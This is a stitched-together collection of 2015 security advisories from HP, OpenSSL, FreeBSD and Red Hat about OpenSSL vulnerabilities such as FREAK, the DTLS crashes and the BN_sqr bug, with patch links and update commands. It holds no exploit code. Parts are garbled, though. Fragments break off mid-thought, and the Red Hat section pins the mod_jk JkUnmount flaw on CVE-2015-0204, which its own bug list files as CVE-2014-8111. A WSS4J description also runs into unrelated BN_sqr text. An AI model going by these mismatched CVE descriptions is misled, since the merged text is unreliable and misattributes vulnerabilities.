https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.
Softpaq:
http://ftp.hp.com/pub/softpaq/sp70501-71000/sp70649.exe
Easy Update Via ThinPro / EasyUpdate (x86):
http://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all-
4.1-4.3-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all-
4.1-4.3-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all-
4.1-4.3-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.1-all-
4.4-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/5.0/service_packs/security-sp-2.1-all-
5.0-5.1-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/5.1/service_packs/security-sp-2.1-all-
5.0-5.1-x86.xar
Via ThinPro / EasyUpdate (ARM):
http://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all-
4.1-4.3-armel.xar
http://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all-
4.1-4.3-armel.xar
http://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all-
4.1-4.3-armel.xar
http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.0-all-
4.4-armel.xar
Note: Known issue on security-sp-2.0-all-4.1-4.3-arm.xar: With the patch
applied, VMware cannot connect if security level is set to "Refuse insecure
connections". Updating VMware to the latest package on ftp.hp.com will solve
the problem.
HP SSL for OpenVMS: All versions prior to 1.4-502.
HP SSL 1.4-502 for OpenVMS (based on OpenSSL 0.9.8ze) is available from the
following locations:
- HP SSL for OpenVMS website:
http://h71000.www7.hp.com/openvms/products/ssl/ssl.html
- HP Support Center website:
https://h20566.www2.hp.com/portal/site/hpsc/patch/home
Note: Login using your HP Passport account. OpenSSL Security Advisory [08 Jan 2015]
=======================================
DTLS segmentation fault in dtls1_get_record (CVE-2014-3571)
===========================================================
Severity: Moderate
A carefully crafted DTLS message can cause a segmentation fault in OpenSSL due
to a NULL pointer dereference. This could lead to a Denial Of Service attack.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1k.
OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0p.
OpenSSL 0.9.8 DTLS users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 22nd October 2014 by Markus Stenberg of
Cisco Systems, Inc. The fix was developed by Stephen Henson of the OpenSSL
core team.
DTLS memory leak in dtls1_buffer_record (CVE-2015-0206)
=======================================================
Severity: Moderate
A memory leak can occur in the dtls1_buffer_record function under certain
conditions. In particular this could occur if an attacker sent repeated DTLS
records with the same sequence number but for the next epoch. The memory leak
could be exploited by an attacker in a Denial of Service attack through memory
exhaustion.
This issue affects OpenSSL versions: 1.0.1 and 1.0.0.
OpenSSL 1.0.1 DTLS users should upgrade to 1.0.1k.
OpenSSL 1.0.0 DTLS users should upgrade to 1.0.0p.
This issue was reported to OpenSSL on 7th January 2015 by Chris Mueller who also
provided an initial patch. Further analysis was performed by Matt Caswell of the
OpenSSL development team, who also developed the final patch.
no-ssl3 configuration sets method to NULL (CVE-2014-3569)
=========================================================
Severity: Low
When openssl is built with the no-ssl3 option and a SSL v3 ClientHello is
received the ssl method would be set to NULL which could later result in
a NULL pointer dereference.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 17th October 2014 by Frank Schmirler. The
fix was developed by Kurt Roeckx.
ECDHE silently downgrades to ECDH [Client] (CVE-2014-3572)
==========================================================
Severity: Low
An OpenSSL client will accept a handshake using an ephemeral ECDH ciphersuite
using an ECDSA certificate if the server key exchange message is omitted. This
effectively removes forward secrecy from the ciphersuite.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan
Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen
Henson of the OpenSSL core team.
RSA silently downgrades to EXPORT_RSA [Client] (CVE-2015-0204)
==============================================================
Severity: Low
An OpenSSL client will accept the use of an RSA temporary key in a non-export
RSA key exchange ciphersuite. A server could present a weak temporary key
and downgrade the security of the session.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan
Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen
Henson of the OpenSSL core team.
DH client certificates accepted without verification [Server] (CVE-2015-0205)
=============================================================================
Severity: Low
An OpenSSL server will accept a DH certificate for client authentication
without the certificate verify message. This effectively allows a client
to authenticate without the use of a private key. This only affects servers
which trust a client certificate authority which issues certificates
containing DH keys: these are extremely rare and hardly ever encountered.
This issue affects OpenSSL versions: 1.0.1 and 1.0.0.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
This issue was reported to OpenSSL on 22nd October 2014 by Karthikeyan
Bhargavan of the PROSECCO team at INRIA. The fix was developed by Stephen
Henson of the OpenSSL core team.
Certificate fingerprints can be modified (CVE-2014-8275)
========================================================
Severity: Low
OpenSSL accepts several non-DER-variations of certificate signature
algorithm and signature encodings. OpenSSL also does not enforce a
match between the signature algorithm between the signed and unsigned
portions of the certificate. By modifying the contents of the
signature algorithm or the encoding of the signature, it is possible
to change the certificate's fingerprint.
This does not allow an attacker to forge certificates, and does not
affect certificate verification or OpenSSL servers/clients in any
other way. It also does not affect common revocation mechanisms. Only
custom applications that rely on the uniqueness of the fingerprint
(e.g. certificate blacklists) may be affected.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and
0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
One variant of this issue was discovered by Antti Karjalainen and
Tuomo Untinen from the Codenomicon CROSS program and reported to
OpenSSL on 1st December 2014 by NCSC-FI Vulnerability
Co-ordination. Another variant was independently reported to OpenSSL
on 12th December 2014 by Konrad Kraszewski from Google. Further
analysis was conducted and fixes were developed by Stephen Henson of
the OpenSSL core team.
Bignum squaring may produce incorrect results (CVE-2014-3570)
=============================================================
Severity: Low
Bignum squaring (BN_sqr) may produce incorrect results on some
platforms, including x86_64. This bug occurs at random with a very
low probability, and is not known to be exploitable in any way, though
its exact impact is difficult to determine. The following has been
determined:
*) The probability of BN_sqr producing an incorrect result at random
is very low: 1/2^64 on the single affected 32-bit platform (MIPS) and
1/2^128 on affected 64-bit platforms.
*) On most platforms, RSA follows a different code path and RSA
operations are not affected at all. For the remaining platforms
(e.g. OpenSSL built without assembly support), pre-existing
countermeasures thwart bug attacks [1].
*) Static ECDH is theoretically affected: it is possible to construct
elliptic curve points that would falsely appear to be on the given
curve. However, there is no known computationally feasible way to
construct such points with low order, and so the security of static
ECDH private keys is believed to be unaffected.
*) Other routines known to be theoretically affected are modular
exponentiation, primality testing, DSA, RSA blinding, JPAKE and
SRP. No exploits are known and straightforward bug attacks fail -
either the attacker cannot control when the bug triggers, or no
private key material is involved.
This issue affects all current OpenSSL versions: 1.0.1, 1.0.0 and 0.9.8.
OpenSSL 1.0.1 users should upgrade to 1.0.1k.
OpenSSL 1.0.0 users should upgrade to 1.0.0p.
OpenSSL 0.9.8 users should upgrade to 0.9.8zd.
This issue was reported to OpenSSL on 2nd November 2014 by Pieter Wuille
(Blockstream) who also suggested an initial fix. Further analysis was
conducted by the OpenSSL development team and Adam Langley of
Google. The final fix was developed by Andy Polyakov of the OpenSSL
core team.
[1] http://css.csail.mit.edu/6.858/2013/readings/rsa-bug-attacks.pdf
Note
====
As per our previous announcements and our Release Strategy
(https://www.openssl.org/about/releasestrat.html), support for OpenSSL versions
1.0.0 and 0.9.8 will cease on 31st December 2015. No security updates for these
releases will be provided after that date. Users of these releases are advised
to upgrade.
References
==========
URL for this Security Advisory:
https://www.openssl.org/news/secadv_20150108.txt
Note: the online version of the advisory may be updated with additional
details over time.
For details of OpenSSL severity classifications please see:
https://www.openssl.org/about/secpolicy.html
.
References:
CVE-2014-8275 Cryptographic Issues (CWE-310)
CVE-2014-3569 Remote Denial of Service (DoS)
CVE-2014-3570 Cryptographic Issues (CWE-310)
CVE-2014-3571 Remote Denial of Service (DoS)
CVE-2014-3572 Cryptographic Issues (CWE-310)
CVE-2015-0204 Cryptographic Issues (CWE-310)
SSRT101885
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. The
updates are available from either of the following sites:
ftp://sl098ze:Secure12@h2.usa.hp.com
https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber
=OPENSSL11I
HP-UX Release
HP-UX OpenSSL depot name
B.11.11 (11i v1)
OpenSSL_A.00.09.08ze.001_HP-UX_B.11.11_32_64.depot
B.11.23 (11i v2)
OpenSSL_A.00.09.08ze.002_HP-UX_B.11.23_IA-PA.depot
B.11.31 (11i v3)
OpenSSL_A.00.09.08ze.003_HP-UX_B.11.31_IA-PA.depot
MANUAL ACTIONS: Yes - Update
Install OpenSSL A.00.09.08ze or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins
issued by HP and lists recommended actions that may apply to a specific HP-UX
system. It can also download patches and create a depot automatically. For
more information see: https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant
| VAR-201501-0338 | CVE-2015-0204 | OpenSSL of s3_clnt.c of ssl3_get_key_exchange In function RSA-to-EXPORT_RSA Vulnerabilities that are subject to downgrade attacks |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct RSA-to-EXPORT_RSA downgrade attacks and facilitate brute-force decryption by offering a weak ephemeral RSA key in a noncompliant role, related to the "FREAK" issue. NOTE: the scope of this CVE is only client code based on OpenSSL, not EXPORT_RSA issues associated with servers or other TLS implementations. OpenSSL is prone to security-bypass vulnerability.
Successfully exploiting these issues may allow attackers to perform unauthorized actions by conducting a man-in-the-middle attack. This may lead to other attacks.
CVE-2014-3571
Markus Stenberg of Cisco Systems, Inc.
For the upcoming stable distribution (jessie), these problems will be
fixed soon.
We recommend that you upgrade your openssl packages. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
=============================================================================
FreeBSD-SA-15:01.openssl Security Advisory
The FreeBSD Project
Topic: OpenSSL multiple vulnerabilities
Category: contrib
Module: openssl
Announced: 2015-01-14
Affects: All supported versions of FreeBSD.
Corrected: 2015-01-09 00:58:20 UTC (stable/10, 10.1-STABLE)
2015-01-14 21:27:46 UTC (releng/10.1, 10.1-RELEASE-p4)
2015-01-14 21:27:46 UTC (releng/10.0, 10.0-RELEASE-p16)
2015-01-09 01:11:43 UTC (stable/9, 9.3-STABLE)
2015-01-14 21:27:46 UTC (releng/9.3, 9.3-RELEASE-p8)
2015-01-09 01:11:43 UTC (stable/8, 8.4-STABLE)
2015-01-14 21:27:46 UTC (releng/8.4, 8.4-RELEASE-p22)
CVE Name: CVE-2014-3571, CVE-2015-0206, CVE-2014-3569, CVE-2014-3572
CVE-2015-0204, CVE-2015-0205, CVE-2014-8275, CVE-2014-3570
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.
I. Background
FreeBSD includes software from the OpenSSL Project. The OpenSSL Project is
a collaborative effort to develop a robust, commercial-grade, full-featured
Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3)
and Transport Layer Security (TLS v1) protocols as well as a full-strength
general purpose cryptography library.
II. Problem Description
A carefully crafted DTLS message can cause a segmentation fault in OpenSSL
due to a NULL pointer dereference. [CVE-2014-3571]
A memory leak can occur in the dtls1_buffer_record function under certain
conditions. [CVE-2015-0206]
When OpenSSL is built with the no-ssl3 option and a SSL v3 ClientHello is
received the ssl method would be set to NULL which could later result in
a NULL pointer dereference. [CVE-2014-3569] This does not affect
FreeBSD's default build.
An OpenSSL client will accept a handshake using an ephemeral ECDH
ciphersuite using an ECDSA certificate if the server key exchange message
is omitted. [CVE-2014-3572]
An OpenSSL client will accept the use of an RSA temporary key in a non-export
RSA key exchange ciphersuite. [CVE-2015-0204]
An OpenSSL server will accept a DH certificate for client authentication
without the certificate verify message. [CVE-2015-0205]
OpenSSL accepts several non-DER-variations of certificate signature
algorithm and signature encodings. OpenSSL also does not enforce a
match between the signature algorithm between the signed and unsigned
portions of the certificate. [CVE-2014-8275]
Bignum squaring (BN_sqr) may produce incorrect results on some
platforms, including x86_64. [CVE-2014-3570]
III. Impact
An attacker who can send a carefully crafted DTLS message can cause server
daemons that uses OpenSSL to crash, resulting a Denial of Service.
[CVE-2014-3571]
An attacker who can send repeated DTLS records with the same sequence number
but for the next epoch can exhaust the server's memory and result in a Denial of
Service. [CVE-2015-0206]
A server can remove forward secrecy from the ciphersuite. [CVE-2014-3572]
A server could present a weak temporary key and downgrade the security of
the session. [CVE-2015-0204]
A client could authenticate without the use of a private key. This only
affects servers which trust a client certificate authority which issues
certificates containing DH keys, which is extremely rare. [CVE-2015-0205]
By modifying the contents of the signature algorithm or the encoding of
the signature, it is possible to change the certificate's fingerprint.
This does not allow an attacker to forge certificates, and does not
affect certificate verification or OpenSSL servers/clients in any
other way. It also does not affect common revocation mechanisms. Only
custom applications that rely on the uniqueness of the fingerprint
(e.g. certificate blacklists) may be affected. [CVE-2014-8275]
IV. Workaround
No workaround is available.
V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.
2) To update your vulnerable system via a binary patch:
Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:
# freebsd-update fetch
# freebsd-update install
3) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to the applicable
FreeBSD release branches.
a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.
[FreeBSD 8.4 and FreeBSD 9.3]
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-9.3.patch
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-9.3.patch.asc
# gpg --verify openssl-9.3.patch.asc
[FreeBSD 10.0]
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.0.patch
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.0.patch.asc
# gpg --verify openssl-10.0.patch.asc
[FreeBSD 10.1]
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.1.patch
# fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.1.patch.asc
# gpg --verify openssl-10.1.patch.asc
b) Apply the patch. Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
c) Recompile the operating system using buildworld and installworld as
described in <URL:https://www.FreeBSD.org/handbook/makeworld.html>.
Restart all deamons using the library, or reboot the system.
VI. Correction details
The following list contains the correction revision numbers for each
affected branch.
Branch/path Revision
- -------------------------------------------------------------------------
stable/8/ r276865
releng/8.4/ r277195
stable/9/ r276865
releng/9.3/ r277195
stable/10/ r276864
releng/10.0/ r277195
releng/10.1/ r277195
- -------------------------------------------------------------------------
To see which files were modified by a particular revision, run the
following command, replacing NNNNNN with the revision number, on a
machine with Subversion installed:
# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base
Or visit the following URL, replacing NNNNNN with the revision number:
<URL:https://svnweb.freebsd.org/base?view=revision&revision=NNNNNN>
VII. References
<URL:https://www.openssl.org/news/secadv_20150108.txt>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206>
The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-15:01.openssl.asc>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.1.1 (FreeBSD)
iQIcBAEBCgAGBQJUtuEaAAoJEO1n7NZdz2rnQCcP/A19v5HUUhjz5nMbUumRwAmB
QCxNKEy6SbAuxtIwGNYJyyxKIK3R9vTHwlgyQZVb4q8FgMHcu4yABeRfov10mO5Q
U7RkLOJyca6eqEngkrh+AFfbhqfxtccIMUQkDdegsQcqZd2Ya0VeNfjA8H0XIDoL
JSEoCifmxjv6v8ZcpugahsUOBmEWx+vyHJUSPVSv/AsLubzV3hqi4iLpzLky3/dR
4LHGzPny07NkGPVqOBU7mjTs76SzCTS2c4NIVfvbphx8UojMvREbZ8ogCMEVGBXY
fIWesi7Y6lhqbSgWj1EXyZF9NTo/Z4nr7Oh1ER5VSAfmhZAdyhEEEGQrg4Jq0VL3
DJ1Y35Up79xXmVjB14COxodI5UO+55wWnXb8r/zy/eh+wv0sHwlTz56wxo7SxAOa
xOrQj0VJ7zghLhBO7azacbVYIKpfQkJafb7XRUOqu4wt2y3/jeL+0UkWJnNMROrq
aQUB6SdGUVDwQsmodgF0rsGcQYXhaQBPu4KQo8yG8+rpqc2zewi537BJr/PWJvH0
sJ6yYcD7VGyIleVRDpxsg7uBWelnGn+AqHignbyUcic4j/N9lYlF00AVgka2TdOp
i5eZtp7m95v53S4fEX2HGwWpOv+AfCrSKQZGpvdNx+9JyD3LyOvFBxs4k0oZWa6J
6FLFZ38YkLcUIzW6I6Kc
=ztFk
-----END PGP SIGNATURE-----
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Important: Red Hat JBoss Enterprise Application Platform 6.4.0 update
Advisory ID: RHSA-2015:0849-01
Product: Red Hat JBoss Enterprise Application Platform
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0849.html
Issue date: 2015-04-16
CVE Names: CVE-2014-3570 CVE-2014-3586 CVE-2014-8111
CVE-2015-0204 CVE-2015-0226 CVE-2015-0227
CVE-2015-0277
=====================================================================
1. Summary:
Updated packages that provide Red Hat JBoss Enterprise Application Platform
6.4.0, and fix multiple security issues, several bugs, and add various
enhancements, are now available from the Red Hat Customer Portal.
Red Hat Product Security has rated this update as having Important security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section. Description:
Red Hat JBoss Enterprise Application Platform 6 is a platform for Java
applications based on JBoss Application Server 7.
It was found that a prior countermeasure in Apache WSS4J for
Bleichenbacher's attack on XML Encryption (CVE-2011-2487) threw an
exception that permitted an attacker to determine the failure of the
attempted attack, thereby leaving WSS4J vulnerable to the attack.
The original flaw allowed a remote attacker to recover the entire plain
text form of a symmetric key. (CVE-2015-0226)
A flaw was found in the way PicketLink's Service Provider and Identity
Provider handled certain requests. A remote attacker could use this flaw to
log to a victim's account via PicketLink. (CVE-2015-0277)
It was discovered that a JkUnmount rule for a subtree of a previous JkMount
rule could be ignored. This could allow a remote attacker to potentially
access a private artifact in a tree that would otherwise not be accessible
to them. (CVE-2015-0204)
It was found that Apache WSS4J permitted bypass of the
requireSignedEncryptedDataElements configuration property via XML Signature
wrapping attacks. A remote attacker could use this flaw to modify the
contents of a signed request. This flaw could
possibly affect certain OpenSSL library functionality, such as RSA
blinding. Note that this issue occurred rarely and with a low probability,
and there is currently no known way of exploiting it. (CVE-2014-3570)
It was found that the Command Line Interface, as provided by Red Hat
Enterprise Application Platform, created a history file named
.jboss-cli-history in the user's home directory with insecure default file
permissions. This could allow a malicious local user to gain information
otherwise not accessible to them. (CVE-2014-3586)
The CVE-2015-0277 issue was discovered by Ondrej Kotek of Red Hat.
This release of JBoss Enterprise Application Platform also includes bug
fixes and enhancements. Documentation for these changes will be available
shortly from the JBoss Enterprise Application Platform 6.4.0 Release Notes,
linked to in the References.
All users of Red Hat JBoss Enterprise Application Platform 6.3 as provided
from the Red Hat Customer Portal are advised to apply this update.
The JBoss server process must be restarted for the update to take effect. Solution:
The References section of this erratum contains a download link (you must
log in to download the update). Before applying this update, back up your
existing Red Hat JBoss Enterprise Application Platform installation and
deployed applications. Bugs fixed (https://bugzilla.redhat.com/):
1126687 - CVE-2014-3586 JBoss AS CLI: Insecure default permissions on history file
1180184 - CVE-2015-0204 openssl: only allow ephemeral RSA keys in export ciphersuites (FREAK)
1180240 - CVE-2014-3570 openssl: Bignum squaring may produce incorrect results
1182591 - CVE-2014-8111 Tomcat mod_jk: information leak due to incorrect JkMount/JkUnmount directives processing
1191446 - CVE-2015-0226 wss4j: Apache WSS4J is vulnerable to Bleichenbacher's attack (incomplete fix for CVE-2011-2487)
1191451 - CVE-2015-0227 wss4j: Apache WSS4J doesn't correctly enforce the requireSignedEncryptedDataElements property
1194832 - CVE-2015-0277 PicketLink: SP does not take Audience condition of a SAML assertion into account
5. References:
https://access.redhat.com/security/cve/CVE-2014-3570
https://access.redhat.com/security/cve/CVE-2014-3586
https://access.redhat.com/security/cve/CVE-2014-8111
https://access.redhat.com/security/cve/CVE-2015-0204
https://access.redhat.com/security/cve/CVE-2015-0226
https://access.redhat.com/security/cve/CVE-2015-0227
https://access.redhat.com/security/cve/CVE-2015-0277
https://access.redhat.com/security/updates/classification/#important
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=appplatform&version=6.4
https://access.redhat.com/documentation/en-US/JBoss_Enterprise_Application_Platform/
6. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
The Montgomery ladder implementation in OpenSSL through 1.0.0l does
not ensure that certain swap operations have a constant-time behavior,
which makes it easier for local users to obtain ECDSA nonces via a
FLUSH+RELOAD cache side-channel attack (CVE-2014-0076).
The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before
1.0.1g do not properly handle Heartbeat Extension packets, which allows
remote attackers to obtain sensitive information from process memory
via crafted packets that trigger a buffer over-read, as demonstrated
by reading private keys, related to d1_both.c and t1_lib.c, aka the
Heartbleed bug (CVE-2014-0160).
The dtls1_reassemble_fragment function in d1_both.c in OpenSSL
before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does
not properly validate fragment lengths in DTLS ClientHello messages,
which allows remote attackers to execute arbitrary code or cause a
denial of service (buffer overflow and application crash) via a long
non-initial fragment (CVE-2014-0195).
The do_ssl3_write function in s3_pkt.c in OpenSSL 1.x through 1.0.1g,
when SSL_MODE_RELEASE_BUFFERS is enabled, does not properly manage a
buffer pointer during certain recursive calls, which allows remote
attackers to cause a denial of service (NULL pointer dereference
and application crash) via vectors that trigger an alert condition
(CVE-2014-0198).
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before
1.0.1h does not properly restrict processing of ChangeCipherSpec
messages, which allows man-in-the-middle attackers to trigger use of a
zero-length master key in certain OpenSSL-to-OpenSSL communications,
and consequently hijack sessions or obtain sensitive information,
via a crafted TLS handshake, aka the CCS Injection vulnerability
(CVE-2014-0224).
The ssl3_send_client_key_exchange function in s3_clnt.c in OpenSSL
before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h, when
an anonymous ECDH cipher suite is used, allows remote attackers to
cause a denial of service (NULL pointer dereference and client crash)
by triggering a NULL certificate value (CVE-2014-3470).
The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
products, uses nondeterministic CBC padding, which makes it easier
for man-in-the-middle attackers to obtain cleartext data via a
padding-oracle attack, aka the POODLE issue (CVE-2014-3566).
The ssl23_get_client_hello function in s23_srvr.c in OpenSSL
0.9.8zc, 1.0.0o, and 1.0.1j does not properly handle attempts to
use unsupported protocols, which allows remote attackers to cause a
denial of service (NULL pointer dereference and daemon crash) via
an unexpected handshake, as demonstrated by an SSLv3 handshake to
a no-ssl3 application with certain error handling. NOTE: this issue
became relevant after the CVE-2014-3568 fix (CVE-2014-3569).
The BN_sqr implementation in OpenSSL before 0.9.8zd, 1.0.0 before
1.0.0p, and 1.0.1 before 1.0.1k does not properly calculate the square
of a BIGNUM value, which might make it easier for remote attackers to
defeat cryptographic protection mechanisms via unspecified vectors,
related to crypto/bn/asm/mips.pl, crypto/bn/asm/x86_64-gcc.c, and
crypto/bn/bn_asm.c (CVE-2014-3570).
OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k
does not enforce certain constraints on certificate data, which allows
remote attackers to defeat a fingerprint-based certificate-blacklist
protection mechanism by including crafted data within a
certificate's unsigned portion, related to crypto/asn1/a_verify.c,
crypto/dsa/dsa_asn1.c, crypto/ecdsa/ecs_vrf.c, and crypto/x509/x_all.c
(CVE-2014-8275).
Use-after-free vulnerability in the d2i_ECPrivateKey function in
crypto/ec/ec_asn1.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r,
1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a might allow remote
attackers to cause a denial of service (memory corruption and
application crash) or possibly have unspecified other impact via a
malformed Elliptic Curve (EC) private-key file that is improperly
handled during import (CVE-2015-0209).
The ASN1_item_ex_d2i function in crypto/asn1/tasn_dec.c in OpenSSL
before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2
before 1.0.2a does not reinitialize CHOICE and ADB data structures,
which might allow attackers to cause a denial of service (invalid
write operation and memory corruption) by leveraging an application
that relies on ASN.1 structure reuse (CVE-2015-0287).
The PKCS#7 implementation in OpenSSL before 0.9.8zf, 1.0.0 before
1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not
properly handle a lack of outer ContentInfo, which allows attackers to
cause a denial of service (NULL pointer dereference and application
crash) by leveraging an application that processes arbitrary PKCS#7
data and providing malformed data with ASN.1 encoding, related to
crypto/pkcs7/pk7_doit.c and crypto/pkcs7/pk7_lib.c (CVE-2015-0289).
The updated packages have been upgraded to the 1.0.1m version where
these security flaws has been fixed.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5298
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0076
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0195
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0198
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0221
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3470
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0209
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0286
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0287
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0288
